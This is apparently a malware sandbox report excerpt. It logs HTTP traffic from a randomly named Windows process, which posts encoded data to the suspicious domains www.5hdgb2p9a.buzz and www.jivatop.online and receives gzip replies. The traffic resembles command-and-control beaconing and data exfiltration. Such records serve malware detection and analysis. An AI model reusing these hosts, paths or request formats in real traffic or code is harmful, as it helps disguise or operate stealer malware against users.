20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
Nov 4, 2024 10:13:39.985734940 CET	203	IN	Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50047	168.76.221.252	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:45.625785112 CET	738	OUT	POST /lxjv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.5hdgb2p9a.buzz Origin: http://www.5hdgb2p9a.buzz Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.5hdgb2p9a.buzz/lxjv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 50 62 4b 78 6c 6b 48 36 30 42 67 6a 4d 38 73 50 6f 4f 45 41 69 41 4d 67 41 51 45 79 2b 4b 47 67 6d 4e 42 6a 72 67 4a 71 67 58 48 70 2b 4a 41 34 53 50 42 59 41 6f 6d 52 56 47 66 62 6b 52 79 59 6c 2f 57 69 39 73 44 66 67 49 31 63 44 56 32 38 6d 38 75 5a 67 73 6a 6a 30 44 6c 51 53 75 51 6d 64 61 52 38 6e 37 77 39 75 42 51 59 62 34 6a 36 44 79 46 6f 50 75 58 62 4c 38 37 68 61 31 31 54 6f 62 4f 68 2f 4d 4e 4b 4d 63 31 70 32 48 79 4e 38 2f 46 71 73 2f 66 6b 43 7a 52 62 56 45 55 5a 45 50 46 64 6a 34 70 65 2f 45 48 70 6e 72 50 72 67 49 7a 65 35 77 3d 3d Data Ascii: Q8r=zIRH887W8jB4PbKxlkH60BgjM8sPoOEAiAMgAQEy+KGgmNBjrgJqgXHp+JA4SPBYAomRVGfbkRyYl/Wi9sDfgI1cDV28m8uZgsjj0DlQSuQmdaR8n7w9uBQYb4j6DyFoPuXbL87ha11TobOh/MNKMc1p2HyN8/Fqs/fkCzRbVEUZEPFdj4pe/EHpnrPrgIze5w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50048	168.76.221.252	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:48.176172018 CET	758	OUT	POST /lxjv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.5hdgb2p9a.buzz Origin: http://www.5hdgb2p9a.buzz Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.5hdgb2p9a.buzz/lxjv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 4f 37 61 78 32 58 66 36 31 68 68 52 49 4d 73 50 6a 75 45 45 69 41 41 67 41 52 51 69 2f 35 69 67 68 73 78 6a 71 68 4a 71 68 58 48 70 6d 35 41 33 57 50 42 52 41 6f 71 76 56 47 6a 62 6b 52 32 59 6c 37 47 69 39 61 4c 63 67 59 31 65 4c 31 32 2b 6c 4d 75 5a 67 73 6a 6a 30 44 67 33 53 75 49 6d 64 71 42 38 68 71 78 50 77 52 51 62 4d 49 6a 36 48 79 46 73 50 75 57 4f 4c 34 62 48 61 7a 78 54 6f 5a 57 68 2b 65 6c 4e 56 73 31 7a 72 58 7a 63 38 38 6c 76 69 66 75 66 42 6a 46 2f 59 45 67 66 49 70 49 48 79 4a 49 4a 74 45 6a 61 36 73 47 66 74 4c 4f 58 69 39 34 2f 42 68 6d 47 35 42 67 36 6d 68 34 75 77 53 2b 57 69 4a 55 3d Data Ascii: Q8r=zIRH887W8jB4O7ax2Xf61hhRIMsPjuEEiAAgARQi/5ighsxjqhJqhXHpm5A3WPBRAoqvVGjbkR2Yl7Gi9aLcgY1eL12+lMuZgsjj0Dg3SuImdqB8hqxPwRQbMIj6HyFsPuWOL4bHazxToZWh+elNVs1zrXzc88lvifufBjF/YEgfIpIHyJIJtEja6sGftLOXi94/BhmG5Bg6mh4uwS+WiJU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50049	168.76.221.252	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:50.723597050 CET	10840	OUT	POST /lxjv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.5hdgb2p9a.buzz Origin: http://www.5hdgb2p9a.buzz Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.5hdgb2p9a.buzz/lxjv/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 4f 37 61 78 32 58 66 36 31 68 68 52 49 4d 73 50 6a 75 45 45 69 41 41 67 41 52 51 69 2f 35 71 67 6d 65 35 6a 72 47 6c 71 37 58 48 70 72 5a 41 6a 57 50 41 52 41 6f 79 7a 56 47 76 68 6b 54 2b 59 6c 5a 4f 69 2f 76 72 63 72 59 31 65 55 46 32 7a 6d 38 75 4d 67 6f 47 6f 30 44 77 33 53 75 49 6d 64 73 39 38 77 37 78 50 79 52 51 59 62 34 6a 32 44 79 46 55 50 75 65 65 4c 2b 48 58 61 44 52 54 72 36 75 68 79 4c 35 4e 63 73 31 74 6f 58 7a 45 38 38 6f 2f 69 66 44 6b 42 6a 78 42 59 48 38 66 5a 2b 56 42 6a 61 77 52 30 30 6a 34 73 76 61 47 70 63 36 74 70 39 59 2b 4f 41 6d 79 75 6a 6f 68 6f 44 68 35 31 52 36 52 35 73 52 56 43 31 68 42 58 46 74 4b 30 37 36 73 38 61 49 42 42 6c 55 56 41 31 6f 45 69 69 6a 74 4e 36 44 77 4b 66 51 64 57 79 7a 70 65 53 38 46 41 39 6d 61 63 33 72 50 38 34 6b 7a 52 6a 66 4f 4e 72 38 35 48 76 63 48 68 30 75 7a 52 67 33 74 46 67 68 2f 52 4d 61 75 53 34 57 54 37 53 30 51 71 54 5a 51 4c 65 49 6d 2f 66 32 6a 53 4f 79 55 4d 31 33 2b 2f 42 34 54 34 51 [TRUNCATED] Data Ascii: Q8r=zIRH887W8jB4O7ax2Xf61hhRIMsPjuEEiAAgARQi/5qgme5jrGlq7XHprZAjWPARAoyzVGvhkT+YlZOi/vrcrY1eUF2zm8uMgoGo0Dw3SuImds98w7xPyRQYb4j2DyFUPueeL+HXaDRTr6uhyL5Ncs1toXzE88o/ifDkBjxBYH8fZ+VBjawR00j4svaGpc6tp9Y+OAmyujohoDh51R6R5sRVC1hBXFtK076s8aIBBlUVA1oEiijtN6DwKfQdWyzpeS8FA9mac3rP84kzRjfONr85HvcHh0uzRg3tFgh/RMauS4WT7S0QqTZQLeIm/f2jSOyUM13+/B4T4QGvejwPDFhlZH/BpNrEdt1FJYAeoPVuZIwz/c6isXJxbkl5wxXTOb1TIS4cXPE3+X0lQDh8R8L8o1pt1cJyN0zxOHbGYmaQKrG5wFLvlgAHXPnZyS/VwsbETf0JdUkZXOzL1exakMZ6wGNZGL8ZN+Hegyl+iXrClPzCZCT63HUaJ3Nf1EVf7+8CEbawbbS2fm4iEWbrWJAtL9M/3keFP/7v/mbpLYyeyByL6xJGEW31uOSakDzPh/Q2fH3amylvag0bROQUe8jFLBqst6Z7NzePRmUgdv0rjk2BV9G8WOtEekBBxWxmm5q88PCP7cPsTCJinGYkJvoz7+gCFDEHew1BP8S8zEFlpTA6fC8UKXsEaRx8eGSSpm9JyDem7+rK9+h6qYw4GVcKCVD7pNt8cE3vjt3rt6aHcEPmpQPQdcaeU6vpFpWohSaCHwMUMs9baNpK9Gxb2fQ3JD4/XYMFhk/hostqhmds7ssCy/qUsN3wb//nclaZjunAHwMrGwPWQCklB/zFKxhvPjErZtRPlEsr0EFtVZJd+7UYn/l3eo5h95Rdz+KgfCUBrZ7pdIt8WgrDCEe+PR7ZAiFHRis20VB2W4dEq6etomMnCNI/j2cblgLZ1Qw+XYG6evKBjT1yJg3SEsQ2ZN4RsyodzDQDf7EUcYB6QrgH7nL4 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50050	168.76.221.252	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:53.387837887 CET	466	OUT	GET /lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.5hdgb2p9a.buzz Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50051	185.179.189.193	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:13:59.645554066 CET	738	OUT	POST /kbf1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.jivatop.online Origin: http://www.jivatop.online Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.jivatop.online/kbf1/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 2b 62 58 6e 65 4a 36 2f 38 69 36 37 48 67 56 6a 4b 5a 6b 6e 72 50 4c 46 39 45 49 48 4b 76 4c 45 74 77 56 33 5a 53 64 61 73 35 68 43 64 4d 58 70 77 4a 52 50 74 39 77 32 61 4c 6e 54 45 49 7a 76 30 39 34 49 4b 34 4a 49 34 56 53 61 6c 78 4d 78 57 79 35 48 50 57 75 69 64 58 49 64 37 50 4a 79 56 48 36 69 6a 33 50 74 74 70 38 38 31 76 69 4d 78 75 5a 4e 41 59 46 71 2f 45 2f 46 7a 44 4a 50 61 65 31 64 58 50 54 6d 7a 49 6d 38 43 30 4f 61 72 33 41 42 78 39 77 5a 39 2b 76 68 51 32 4d 57 4c 39 42 64 4f 6b 33 43 44 49 7a 67 6a 45 79 64 32 52 67 51 54 31 42 61 52 6c 52 57 59 6e 35 67 31 67 3d 3d Data Ascii: Q8r=+bXneJ6/8i67HgVjKZknrPLF9EIHKvLEtwV3ZSdas5hCdMXpwJRPt9w2aLnTEIzv094IK4JI4VSalxMxWy5HPWuidXId7PJyVH6ij3Pttp881viMxuZNAYFq/E/FzDJPae1dXPTmzIm8C0Oar3ABx9wZ9+vhQ2MWL9BdOk3CDIzgjEyd2RgQT1BaRlRWYn5g1g==
Nov 4, 2024 10:14:00.640861034 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 04 Nov 2024 09:14:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Content-Encoding: gzip Expires: Mon, 04 Nov 2024 09:14:00 GMT Set-Cookie: _subid=3qajmfe2dlt8v; expires=Thu, 05 Dec 2024 09:14:00 GMT; path=/ Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwNzExNjQwfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwNzExNjQwfSxcInRpbWVcIjoxNzMwNzExNjQwfSJ9.uFz9Sd1YXciHddkYNklNkeUFgqXoDg6r1cwSpv-QaTo; expires=Sat, 09 Sep 2079 18:28:00 GMT; path=/ Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Access-Control-Allow-Origin: * Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5f 6f 1c 47 76 ef bb 3f 45 2f 1f 2e ee c5 d5 11 45 c9 a6 6d 2e a9 7d d8 bb 17 c9 4b 12 24 5e 2c f2 44 d4 74 17 d9 65 75 57 75 aa aa 5b ea 21 0c 90 1c cb 94 57 b2 98 f5 2e 76 03 af 1d 7b 91 20 1b c0 48 76 48 73 ac d1 90 1c 02 fa 04 55 5f 61 3f 49 50 a7 7a 86 94 44 8e a9 84 c6 f4 58 ad 07 91 d3 ec ea 29 72 4e 9d df f9 fb 3b 6f 2c ff e8 ff fd f5 4f df fb fb bf f9 59 10 eb 34 b9 fd c6 b2 fb 12 24 84 af af cc 51 3e 77 fb 8d 20 08 82 e5 98 92 e8 f6 72 8b 28 1a c4 92 ae ad cc cd 27 84 47 54 ce 73 51 08 a5 19 28 ba 2e 22 5e 12 00 28 14 85 ea f2 3c e3 11 bd 77 3d 8b b3 ea 41 f8 b0 94 6a 12 c4 5a 67 40 ff 21 67 c5 ca dc 4f 05 d7 94 6b 78 af cc e8 5c 10 fa 57 2b 73 9a de d3 f3 6e 3b 3f 0e c2 98 48 45 f5 ca cf df fb ff f0 ce 5c 30 7f e6 69 9a e9 84 de 36 5f 98 a1 d9 37 43 bb 65 b7 4d 3f b0 5b a6 67 be 31 43 73 60 8e ed 6e b0 14 98 4f dd a5 c0 1c 9f bd 6d 79 de 2f 7e 61 6b 9c a4 74 65 ae 60 f4 6e 26 a4 3e b3 a1 bb 2c d2 f1 4a 44 0b 16 52 c0 17 d7 02 c6 99 66 24 [TRUNCATED] Data Ascii: d96}_oGv?E/.Em.}K$^,DteuWu[!W.v{ HvHsU_a?IPzDX)rN;o,OY4$Q>w r('GTsQ(."^(<w=AjZg@!gOkx\W+sn;?HE\0i6_7CeM?[g1Cs`nOmy/~akte`n&>,JDRf$,<;eBULRkku=TOW_WF7oWHGN=XZxsFv3_t}~u@6U+snuwo[xG,K(h1L\|o~7~%td2OFD<og?
Nov 4, 2024 10:14:00.640980005 CET	212	IN	Data Raw: ee ea 1c b6 44 54 06 61 42 94 5a 99 fb db 9f 9f 3d 54 11 2b 46 3f 48 84 13 8f c0 7f 01 c0 af d1 99 7b cf bf 7f 75 d5 7d 65 7c 7d ee f6 f2 7c c4 8a 33 cf 7e e1 e5 99 a5 77 25 c9 5e 7c b2 97 ce d1 1d 11 5d 23 79 a2 e7 02 fc f8 57 e6 22 a6 b2 84 94 Data Ascii: DTaBZ=T+F?H{u}e\|}\|3~w%^\|]#yW"KZBT@Nj+!~9q1K}4U3>~X/Ow%\{[N/:oz7kwj{Du!K2z
Nov 4, 2024 10:14:00.641124964 CET	1236	IN	Data Raw: a2 44 c8 a8 2e cf 79 ff 7f 36 7b f6 63 d3 43 3d b9 6f ba df db 0e 5a b9 62 9c ba d3 ff d2 16 fe dd 0c 6d 07 cc 9e e9 9b 27 e6 d8 ed e5 7b db 45 4c 49 a2 e3 73 f6 f0 3b 73 60 86 76 d3 81 86 7d 64 7a df db 06 42 21 ee b8 a3 f7 f2 0e 3e b3 1d 73 68 Data Ascii: D.y6{cC=oZbm'{ELIs;s`v}dzB!>sh(<'#,#oxgt7pUFX$!i%wrKwp]Ju^tk-Y]<ju"h%"73c$hSKw>+u
Nov 4, 2024 10:14:00.641449928 CET	1236	IN	Data Raw: a9 69 fd 85 1b de 8b aa ab de 6f e4 6a 56 b4 fe a7 81 f9 dc d9 b5 66 60 f6 4d 2f 58 58 04 af c9 d1 bd 41 17 66 68 0e 1c 16 a0 b2 1f 9a 41 60 3b e6 c8 c1 03 86 e9 9c 4b d4 33 07 18 dc 7b 1a d8 0f 31 af 74 64 1f 62 b6 c8 6e a1 3a 3d 46 77 eb 23 fb Data Ascii: iojVf`M/XXAfhA`;K3{1tdbn:=Fw#pp5ZOy$BH:HTH$! Z@fhK4%d]D$v7sZj?~ZQa16@{bCFPm*Ux.Bfm\4UAx/0:DaMG/Ss0Z$iDPJ
Nov 4, 2024 10:14:00.641455889 CET	424	IN	Data Raw: b9 f9 90 51 49 13 91 12 ce 45 09 79 24 0a 16 c6 94 87 4d 1d e1 f4 72 de ad 51 5f 74 4d 01 a4 91 b8 99 47 9a 67 5f 9b 2f 2b 0a a9 a1 cf 7e 7b 5a 5c 87 1f 7d 6c 78 f3 2c 86 7d d3 7b 76 b8 34 4e 44 9c 03 4b d7 46 f9 07 1f 19 42 f8 ba 8f 4d 74 7d 74 Data Ascii: QIEy$MrQ_tMGg_/+~{Z\}lx,}{v4NDKFBMt}t90kq9n40R%LvI{2>='Zb9IE$ES2nj<<F1;f"?}lD.+D"TCMR`EBH;*+Io0
Nov 4, 2024 10:14:00.642085075 CET	1236	IN	Data Raw: 62 5c 08 8b 96 4e bb 2e 9a bc c4 a5 56 4e da f5 15 c5 7a 84 f6 31 5a 3f 33 40 41 41 54 cc 52 10 72 9d 70 d6 4e 45 0a 40 15 4e 12 80 8c 69 20 49 28 d6 45 02 0b 90 52 55 12 dd 54 91 4f b3 cf f9 46 9d 3d 82 46 b4 66 09 11 3e f5 44 a8 55 30 ff 74 60 Data Ascii: b\N.VNz1Z?3@AATRrpNE@Ni I(ERUTOF=Ff>DU0t`HCQ9?rigT85_s10Cd;Ag&Y{R<R,!IQPP,IpT3\|x2*$<BPTF49KtrEy3bn4xDJ>AY?
Nov 4, 2024 10:14:00.642091990 CET	1236	IN	Data Raw: cd 53 b6 c6 b4 62 52 14 84 bb f3 aa 69 22 a0 5d d0 76 c4 00 20 23 19 e3 2c 86 48 84 31 0d 01 c0 5d 5c 63 6d 99 87 04 00 8a 84 44 2c 65 92 00 cb 88 16 45 53 8c 3e 45 a8 a8 b9 f3 d1 48 de 0f 07 48 90 53 c9 67 a1 b1 6e f5 18 8d 7e 44 8e 23 db 31 47 Data Ascii: SbRi"]v #,H1]\cmD,eES>EHHSgn~D#1GfiTagt8<;t:wd~j6}\|M9BZlx-9B$"a@BHPv!yAZ$mFF*OV?J;U7_C
Nov 4, 2024 10:14:00.642688990 CET	294	IN	Data Raw: 75 8e eb 34 f2 54 7f 35 fe 45 15 48 79 5a 19 e6 7e 40 cd 78 3c bf f9 d6 97 f5 8f c8 8a 7a 48 51 6d 3f 34 3d 1c cf df 37 fb 9e f5 68 0f ed ee a1 d3 e6 e3 4c f0 26 0e 61 1e d6 32 46 f3 1a 86 f1 c3 98 29 4d 4a 02 34 6c 0b cd 42 02 10 b2 82 41 9e e4 Data Ascii: u4T5EHyZ~@x<zHQm?4=7hL&a2F)MJ4lBAabB5@J%%~/IrFjLiO<a3U_sW?1v9\H7I{$I&*g%c7=5fmFC'f`!bykz

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50052	185.179.189.193	80

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:14:02.704837084 CET	758	OUT	POST /kbf1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.jivatop.online Origin: http://www.jivatop.online Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.jivatop.online/kbf1/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 2b 62 58 6e 65 4a 36 2f 38 69 36 37 47 44 39 6a 5a 4b 38 6e 6a 50 4c 47 78 6b 49 48 63 66 4c 36 74 77 5a 33 5a 51 74 4b 73 50 78 43 63 74 6e 70 78 49 52 50 68 64 77 32 50 37 6e 57 62 59 7a 6d 30 39 31 39 4b 34 31 49 34 56 32 61 6c 30 49 78 57 44 35 59 64 32 75 67 53 33 4a 37 2f 50 4a 79 56 48 36 69 6a 32 76 48 74 70 55 38 30 62 65 4d 77 50 5a 4d 4f 34 46 6c 2b 45 2f 46 33 44 4a 4c 61 65 30 36 58 4e 33 49 7a 4b 65 38 43 30 2b 61 72 6a 30 47 6d 74 77 62 35 2b 75 2b 41 45 78 35 48 73 6c 63 44 48 44 47 64 36 37 46 69 43 2f 48 6e 67 42 48 42 31 6c 70 4d 69 59 69 56 6b 45 70 75 69 43 79 44 75 37 45 55 66 46 4c 6c 48 37 42 34 44 56 62 33 76 6b 3d Data Ascii: Q8r=+bXneJ6/8i67GD9jZK8njPLGxkIHcfL6twZ3ZQtKsPxCctnpxIRPhdw2P7nWbYzm0919K41I4V2al0IxWD5Yd2ugS3J7/PJyVH6ij2vHtpU80beMwPZMO4Fl+E/F3DJLae06XN3IzKe8C0+arj0Gmtwb5+u+AEx5HslcDHDGd67FiC/HngBHB1lpMiYiVkEpuiCyDu7EUfFLlH7B4DVb3vk=
Nov 4, 2024 10:14:03.717515945 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 04 Nov 2024 09:14:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Content-Encoding: gzip Expires: Mon, 04 Nov 2024 09:14:03 GMT Set-Cookie: _subid=3qajmfe2dlt92; expires=Thu, 05 Dec 2024 09:14:03 GMT; path=/ Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwNzExNjQzfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwNzExNjQzfSxcInRpbWVcIjoxNzMwNzExNjQzfSJ9.BSqzncxLXTS-BVWxtlsj08iqnAUmpSROJZJmxfq_sWA; expires=Sat, 09 Sep 2079 18:28:06 GMT; path=/ Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 Access-Control-Allow-Origin: * Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d dd 6e 1c 47 76 ff bd 9f a2 97 17 7f fc 83 e8 88 22 65 4b 32 97 d4 5e 6c 36 48 6e 92 20 f1 62 91 2b a2 a6 bb 38 5d 56 77 55 a7 aa ba a5 1e c2 c0 90 b4 2c 39 92 c5 ac 77 b1 1b 78 bd b1 17 09 b2 01 8c 64 87 14 c7 1c 91 9c 21 a0 27 a8 7a 85 7d 92 a0 4e f5 f0 4b d4 48 da d0 98 a6 d5 bc 20 67 7a aa 7a 8a 33 a7 ce af ce d7 ef bc b3 f8 83 bf f8 db 1f 7f f0 8f 7f f7 93 20 d6 69 72 fb 9d 45 f7 27 48 08 6f 2f cd 50 3e 73 fb 9d 20 08 82 c5 98 92 e8 f6 62 8b 28 1a c4 92 ae 2c cd cc 26 84 47 54 ce 72 51 08 a5 19 28 da 16 11 2f 09 00 14 8a 42 75 79 96 f1 88 de bb 9a c5 59 75 23 bc 59 4a 35 09 62 ad 33 a0 ff 94 b3 62 69 e6 c7 82 6b ca 35 7c 50 66 74 26 08 fd b3 a5 19 4d ef e9 59 b7 9c 1f 06 61 4c a4 a2 7a e9 a7 1f fc 25 dc 9a 09 66 4f dc 4d 33 9d d0 db e6 b7 66 64 b6 cd c8 ae d9 75 33 08 ec 9a e9 9b a7 66 64 76 cc d0 6e 06 0b 81 f9 dc 5d 0a cc f0 e4 b0 c5 59 3f f9 cc d2 38 49 e9 d2 4c c1 e8 dd 4c 48 7d 62 41 77 59 a4 e3 a5 88 16 2c a4 80 4f ae 04 8c 33 cd 48 02 2a [TRUNCATED] Data Ascii: d96}nGv"eK2^l6Hn b+8]VwU,9wxd!'z}NKH gzz3 irE'Ho/P>s b(,&GTrQ(/BuyYu#YJ5b3bik5\|Pft&MYaLz%fOM3fdu3fdvn]Y?8ILLH}bAwY,O3H$];;eBUL>PfAn7\hJ#F$QSrs7s&<PgWH.]eP4s}7KoA,E0v's*,j6%_]o~>
Nov 4, 2024 10:14:03.717622042 CET	212	IN	Data Raw: 6c 89 a8 0c c2 84 28 b5 34 f3 f7 3f 3d b9 a9 22 56 8c 5f 48 84 13 8f c0 ff 01 c0 bf d1 89 b1 e7 8f 5f 5e 76 7f 19 6f cf dc 5e 9c 8d 58 71 e2 de 67 9e 9e 98 7a 57 92 ec ec 9d bd 74 8e 47 44 74 85 e4 89 9e 09 f0 eb 5f 9a 89 98 ca 12 52 2e 04 2b 09 Data Ascii: l(4?="V_H_^vo^XqgzWtGDt_R.+3sq>>@zif~gxmqDxW]u57)kz!u-SJ'N)_oGmozfMnE-&{D??YR"dT
Nov 4, 2024 10:14:03.717633009 CET	1236	IN	Data Raw: e7 bc ff bf 99 2d fb a9 e9 a3 9e dc 36 bd ef 6c 05 ad 5c 31 4e dd ee 7f 61 09 ff 65 46 76 03 cc 96 19 98 5d 33 74 6b f9 ce 56 11 53 92 e8 f8 9c 35 fc da ec 98 91 ed 3a d0 b0 8f 4d ff 3b 5b 40 28 c4 1d b7 f5 5e 5c c1 17 76 c3 ec 9b 01 0a 42 d7 0c Data Ascii: -6l\1NaeFv]3tkVS5:M;[@(^\vBTg>%tYE-z8[t6ZTGD$N+[{T;M/e[-_g(oRm,V";'dCZ{YA0NA
Nov 4, 2024 10:14:03.718060017 CET	212	IN	Data Raw: f9 79 f7 7d d6 de f8 92 4f e0 73 6a f6 6b 3c 99 af 7d cf fc 73 97 18 10 ee 90 d0 9d d6 da 42 8b 82 69 00 08 45 46 69 18 73 56 02 80 ca 33 00 49 b5 a2 99 76 2f 69 21 59 09 42 69 92 a8 92 80 02 25 0a aa 55 c8 62 28 24 4d 29 6f f6 ef b4 c0 21 ac 39 Data Ascii: y}Osjk<}sBiEFisV3Iv/i!YBi%Ub($M)o!984vy3{CSF47hEfhgf7B`o?1}shfT~kv3k?]GZ}sf0N4n8g$/\|\p[C e<9
Nov 4, 2024 10:14:03.718071938 CET	1236	IN	Data Raw: 49 49 34 14 54 41 41 c3 98 4a 80 f0 b4 62 51 31 0b 89 e4 79 99 43 87 84 b9 0a 73 60 1d 50 71 26 85 6e 94 c6 45 a2 53 f0 46 f0 f4 1e 26 71 d7 14 9c 1a 79 bb fc 20 f5 8b 53 b8 e4 e0 c4 29 e2 c0 1c 98 81 19 da 0d bb 6e 37 ae 04 a6 17 d8 fb 3e a9 c0 Data Ascii: II4TAAJbQ1yCs`Pq&nESF&qy S)n7>n!zmw!@xgax'6fn8]7:JR,!IQPP,IpT1Pa(*#<N(g"$mQ6^U\Fk"8_\|9 ]D}L
